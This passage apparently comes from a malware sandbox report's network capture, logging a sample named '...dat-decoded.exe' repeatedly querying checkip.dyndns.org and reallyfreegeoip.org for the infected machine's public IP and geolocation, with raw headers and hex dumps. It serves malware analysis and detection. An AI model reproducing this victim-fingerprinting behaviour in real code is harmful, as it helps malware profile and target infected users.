                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 27, 2024 10:47:35.408276081 CEST151OUTGET / HTTP/1.1
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                  Host: checkip.dyndns.org
                                                                                  Connection: Keep-Alive
                                                                                  Sep 27, 2024 10:47:35.977077961 CEST320INHTTP/1.1 200 OK
                                                                                  Date: Fri, 27 Sep 2024 08:47:35 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 103
                                                                                  Connection: keep-alive
                                                                                  Cache-Control: no-cache
                                                                                  Pragma: no-cache
                                                                                  X-Request-ID: 25a93a6025ac486d61b111efe7f4ac04
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  5192.168.2.749710158.101.44.242806764C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 27, 2024 10:47:36.616889000 CEST151OUTGET / HTTP/1.1
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                  Host: checkip.dyndns.org
                                                                                  Connection: Keep-Alive
                                                                                  Sep 27, 2024 10:47:37.193453074 CEST320INHTTP/1.1 200 OK
                                                                                  Date: Fri, 27 Sep 2024 08:47:37 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 103
                                                                                  Connection: keep-alive
                                                                                  Cache-Control: no-cache
                                                                                  Pragma: no-cache
                                                                                  X-Request-ID: 5b813e63282ee73a0fdbd6b0d39da9a2
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  6192.168.2.749712158.101.44.242806764C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 27, 2024 10:47:37.823101044 CEST151OUTGET / HTTP/1.1
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                  Host: checkip.dyndns.org
                                                                                  Connection: Keep-Alive
                                                                                  Sep 27, 2024 10:47:38.380419970 CEST320INHTTP/1.1 200 OK
                                                                                  Date: Fri, 27 Sep 2024 08:47:38 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 103
                                                                                  Connection: keep-alive
                                                                                  Cache-Control: no-cache
                                                                                  Pragma: no-cache
                                                                                  X-Request-ID: 9e6604b2fca0fcb362a16ee5e59c0638
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  7192.168.2.749714158.101.44.242806764C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 27, 2024 10:47:38.988795996 CEST151OUTGET / HTTP/1.1
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                  Host: checkip.dyndns.org
                                                                                  Connection: Keep-Alive
                                                                                  Sep 27, 2024 10:47:39.775293112 CEST320INHTTP/1.1 200 OK
                                                                                  Date: Fri, 27 Sep 2024 08:47:39 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 103
                                                                                  Connection: keep-alive
                                                                                  Cache-Control: no-cache
                                                                                  Pragma: no-cache
                                                                                  X-Request-ID: 53be6181c7b8e9caca29ee76df1fe8f0
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                                  Sep 27, 2024 10:47:39.787242889 CEST320INHTTP/1.1 200 OK
                                                                                  Date: Fri, 27 Sep 2024 08:47:39 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 103
                                                                                  Connection: keep-alive
                                                                                  Cache-Control: no-cache
                                                                                  Pragma: no-cache
                                                                                  X-Request-ID: 53be6181c7b8e9caca29ee76df1fe8f0
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                                  HTTPS Proxied Packets

                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  0192.168.2.749700188.114.97.34436764C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-09-27 08:47:30 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                                  Host: reallyfreegeoip.org
                                                                                  Connection: Keep-Alive
                                                                                  2024-09-27 08:47:30 UTC681INHTTP/1.1 200 OK
                                                                                  Date: Fri, 27 Sep 2024 08:47:30 GMT
                                                                                  Content-Type: application/xml
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  access-control-allow-origin: *
                                                                                  vary: Accept-Encoding
                                                                                  Cache-Control: max-age=86400
                                                                                  CF-Cache-Status: HIT
                                                                                  Age: 1406
                                                                                  Last-Modified: Fri, 27 Sep 2024 08:24:04 GMT
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a9KUx%2BuAhvwQA3MDpV9GYEv%2BxQL7WAqmTMLkYeGJ3fmW5BspXRbBG9hQqX%2B8WYqkMxS%2BdgkufmQCeOclrSLpI5W0hL8j%2BbSwBVdPzbkjdUs8I%2Ba9banRz2VtNYeCcqNNrBZI6Abs"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8c9a3ab918137ce2-EWR
                                                                                  2024-09-27 08:47:30 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                                  Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                                  2024-09-27 08:47:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  1192.168.2.749701188.114.97.34436764C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-09-27 08:47:31 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                                  Host: reallyfreegeoip.org
                                                                                  2024-09-27 08:47:31 UTC685INHTTP/1.1 200 OK
                                                                                  Date: Fri, 27 Sep 2024 08:47:31 GMT
                                                                                  Content-Type: application/xml
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  access-control-allow-origin: *
                                                                                  vary: Accept-Encoding
                                                                                  Cache-Control: max-age=86400
                                                                                  CF-Cache-Status: HIT
                                                                                  Age: 1407
                                                                                  Last-Modified: Fri, 27 Sep 2024 08:24:04 GMT
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HC6pQYsrj2s8efM%2FnQKwK4l%2BnTLIAiRKGGf%2FhXxkiCCv%2FLBUGjZ8BxBxNqyL1NJTLEitxKV5QqzDITYbk8zQmkr8eCSmQSezzwhPrtbqVVP0%2FIYYMN%2Bwf2l%2BBOleiD2vJ%2FIqJqc9"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8c9a3abf488e8cda-EWR
                                                                                  2024-09-27 08:47:31 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                                  Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                                  2024-09-27 08:47:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  2192.168.2.749703188.114.97.34436764C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-09-27 08:47:32 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                                  Host: reallyfreegeoip.org
                                                                                  2024-09-27 08:47:32 UTC681INHTTP/1.1 200 OK
                                                                                  Date: Fri, 27 Sep 2024 08:47:32 GMT
                                                                                  Content-Type: application/xml
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  access-control-allow-origin: *
                                                                                  vary: Accept-Encoding
                                                                                  Cache-Control: max-age=86400
                                                                                  CF-Cache-Status: HIT
                                                                                  Age: 1408
                                                                                  Last-Modified: Fri, 27 Sep 2024 08:24:04 GMT
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QGOJl%2Bb0B2HP5uX7cXRoAVFFqBUffNEMb0FcjdcaYf4g3xOnE%2B2L9bUp01pYonQWfLEXzIINVSsVF7UgPd9H13i%2FRmn%2F87YJTxlcO0IVc1Iij0KJap%2B57kYH6w7pw7vGVmu%2Fo0Ub"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8c9a3ac6bcf618fa-EWR
                                                                                  2024-09-27 08:47:32 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                                  Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                                  2024-09-27 08:47:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  3192.168.2.749705188.114.97.34436764C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-09-27 08:47:34 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                                  Host: reallyfreegeoip.org
                                                                                  2024-09-27 08:47:34 UTC681INHTTP/1.1 200 OK
                                                                                  Date: Fri, 27 Sep 2024 08:47:34 GMT
                                                                                  Content-Type: application/xml
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  access-control-allow-origin: *
                                                                                  vary: Accept-Encoding
                                                                                  Cache-Control: max-age=86400
                                                                                  CF-Cache-Status: HIT
                                                                                  Age: 1410
                                                                                  Last-Modified: Fri, 27 Sep 2024 08:24:04 GMT
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vjYL2n8LIR1iJFO9XFo%2FbLuJi8jJDTDHC6Vt3JYYWQbMlwf2Z7%2FvE2yXUHAGfYZTiQkMuZlPatIL6H9tc%2F6nHDZya44xTl3b%2B%2Bat3AX0erRH%2FOKiIA4UHzWqksRZzGdU0C3aPzyV"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8c9a3ace3af04375-EWR
                                                                                  2024-09-27 08:47:34 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                                  Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                                  2024-09-27 08:47:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  4192.168.2.749707188.114.97.34436764C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-09-27 08:47:35 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                                  Host: reallyfreegeoip.org
                                                                                  Connection: Keep-Alive
                                                                                  2024-09-27 08:47:35 UTC675INHTTP/1.1 200 OK
                                                                                  Date: Fri, 27 Sep 2024 08:47:35 GMT
                                                                                  Content-Type: application/xml
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  access-control-allow-origin: *
                                                                                  vary: Accept-Encoding
                                                                                  Cache-Control: max-age=86400
                                                                                  CF-Cache-Status: HIT
                                                                                  Age: 1411
                                                                                  Last-Modified: Fri, 27 Sep 2024 08:24:04 GMT
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=el%2FGsP215r4KPBvlIK939yUVlbCmN1A%2FRror4BGLqrjthyIHJTqiRwJ8bFbasWcNgEGxhPkvdquOSoQfXWnyEb4HuRSmjM%2Fk260Urj3iJklrxdMdGcms5qLvDSVlSN1jI0oYH1Mh"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8c9a3ad5e8cb43e9-EWR
                                                                                  2024-09-27 08:47:35 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                                  Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                                  2024-09-27 08:47:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  5192.168.2.749709188.114.97.34436764C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-09-27 08:47:36 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                                  Host: reallyfreegeoip.org
                                                                                  Connection: Keep-Alive
                                                                                  2024-09-27 08:47:36 UTC675INHTTP/1.1 200 OK
                                                                                  Date: Fri, 27 Sep 2024 08:47:36 GMT
                                                                                  Content-Type: application/xml
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  access-control-allow-origin: *
                                                                                  vary: Accept-Encoding
                                                                                  Cache-Control: max-age=86400
                                                                                  CF-Cache-Status: HIT
                                                                                  Age: 1412
                                                                                  Last-Modified: Fri, 27 Sep 2024 08:24:04 GMT
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Gfz0o%2BqggiWvSrwtdb2GxvhJ0d6kuSccCVM3XYkrS7fREm%2F0CZWCPJ0io14UO%2Fl0mkQ24HRKjevBXTLaC0bmz4zwHdTO9ozJG8tZMd9RYcijbmG3TJodhA4gQc0bzaOUruq24LJx"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8c9a3add6e0b0c84-EWR
                                                                                  2024-09-27 08:47:36 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                                  Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                                  2024-09-27 08:47:36 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  6192.168.2.749711188.114.97.34436764C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-09-27 08:47:37 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                                  Host: reallyfreegeoip.org
                                                                                  Connection: Keep-Alive
                                                                                  2024-09-27 08:47:37 UTC671INHTTP/1.1 200 OK
                                                                                  Date: Fri, 27 Sep 2024 08:47:37 GMT
                                                                                  Content-Type: application/xml
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  access-control-allow-origin: *
                                                                                  vary: Accept-Encoding
                                                                                  Cache-Control: max-age=86400
                                                                                  CF-Cache-Status: HIT
                                                                                  Age: 1413
                                                                                  Last-Modified: Fri, 27 Sep 2024 08:24:04 GMT
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7Nz2AP8nxY0cDOHS8wDUXG0IkCOyDNHHD49ZtWjBzPGuv3pMx1ANi2s4Bl01nEoY5zaNwsteEE6NQTABhTD8tnMZ6zFJvDSppF6BRwlDthG57704ecMqxDFLHLC8JBivcvIuS6%2BT"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8c9a3ae4ef6d8c84-EWR
                                                                                  2024-09-27 08:47:37 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                                  Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                                  2024-09-27 08:47:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  7192.168.2.749713188.114.97.34436764C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe
